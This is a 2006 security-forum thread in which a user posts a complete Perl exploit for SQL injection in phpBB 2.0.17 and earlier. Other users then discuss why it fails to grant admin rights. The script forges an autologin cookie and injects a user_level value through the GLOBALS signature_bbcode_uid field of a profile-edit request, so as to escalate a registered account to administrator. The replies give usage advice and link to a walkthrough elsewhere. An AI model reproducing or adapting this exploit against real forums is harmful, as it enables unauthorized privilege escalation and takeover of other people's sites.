|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 50
Members: 0
Total: 50
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
SQL injection - phpBB 2.0.17 exploit |
|
Posted: Thu Mar 09, 2006 9:44 pm |
|
|
lookatmenow |
Regular user |
|
|
Joined: Feb 24, 2006 |
Posts: 21 |
|
|
|
|
|
|
|
Quote: |
#!/usr/bin/perl
# Exploit for sql injection in phpbb <=2.0.17
# It works with php5, with register_globals on and magic_quotes_gpc off
# Author: Eax (eax@cc-team.org)
use strict;
use LWP::UserAgent;
use Digest::MD5 'md5_hex';
if (@ARGV<6){
print "Usage $0 host path your_id your_password your_email your_username\n";
print "example: $0 target.org /phpbb/ 10 blebleble ble\@ble.pl ble\n\n";
exit;
}
my $host = $ARGV[0];
my $path = $ARGV[1];
my $userid = $ARGV[2];
my $passwd = $ARGV[3];
my $mail = $ARGV[4];
my $username = $ARGV[5];
$passwd = md5_hex($passwd);
my $cookie_string = "phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A%2
2".$passwd."%22%3Bs%3A6%3A%22userid%22%3Bi%3A".$userid."%3B%7D";
my $browser = LWP::UserAgent->new ();
$browser->default_header(Cookie=>$cookie_string);
my $address = 'http://'.$host.$path.'profile.php';
my $response = $browser->post($address, [ "username" => $username, "email" => $mail,
"mode"=>'editprofile', "agreed"=>'true', "coppa"=>'0', "user_id"=>$userid, "
current_email"=>$mail, "submit"=>"Submit", 'GLOBALS[signature_bbcode_uid]'=>"', u
ser_level='1"]);
print "if everything was ok you should have admin rights now \n";
|
I've run this, and it seems to be successful because it always says:
''If everything was ok you should have admin rights now''.
However, I still don't. Is there something I missed...or does it just mean the forum is not vulnerable? |
|
|
|
|
|
|
|
|
Posted: Fri Mar 10, 2006 9:07 am |
|
|
fizzi |
Advanced user |
|
|
Joined: Sep 14, 2005 |
Posts: 55 |
|
|
|
|
|
|
|
As i can see, you have to be registered to that forum and put your data as arguments to that exploits. After that you should be admin at the forum. |
|
|
|
|
Posted: Fri Mar 10, 2006 9:07 am |
|
|
fizzi |
Advanced user |
|
|
Joined: Sep 14, 2005 |
Posts: 55 |
|
|
|
|
|
|
|
As i can see, you have to be registered to that forum and put your data as arguments to that exploits. After that you should be admin at the forum. |
|
|
|
|
Posted: Fri Mar 10, 2006 10:15 am |
|
|
lookatmenow |
Regular user |
|
|
Joined: Feb 24, 2006 |
Posts: 21 |
|
|
|
|
|
|
|
Yeah i've registered etc, put my password email username etc.
like i said it told me 'everything went o.k, you should have admin' and i thought, well that worked nice. then i went on to the forum and i didn't. tried the script whilst i was logged in on the forum aswell, didn't work. so i tried just typing in /admin/index.php and it said i was unauthorized.
which is why i thought maybe that forum wasn't vulnerable perhaps. then again why would the script say it was...but then it not to work. hmmmm tis a thinker. |
|
|
|
|
Posted: Sat May 20, 2006 12:15 am |
|
|
sljyro |
Advanced user |
|
|
Joined: Mar 23, 2006 |
Posts: 53 |
|
|
|
|
|
|
|
can anyone give a slight insight on this one too? i keep getting the same problem as the above user.
thanks |
|
|
|
|
Posted: Sat May 20, 2006 9:09 am |
|
|
smile |
Regular user |
|
|
Joined: May 19, 2006 |
Posts: 5 |
|
|
|
|
|
|
|
if you get troubles with the script try it as it's demonstrated here. Much more obvious what happens and if it works or not.
http://undergr0und.net/forum/showthread.php?t=624
greetz, smile
BTW: IMHO this script has nothing to do with real SQL injection |
|
|
|
|
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|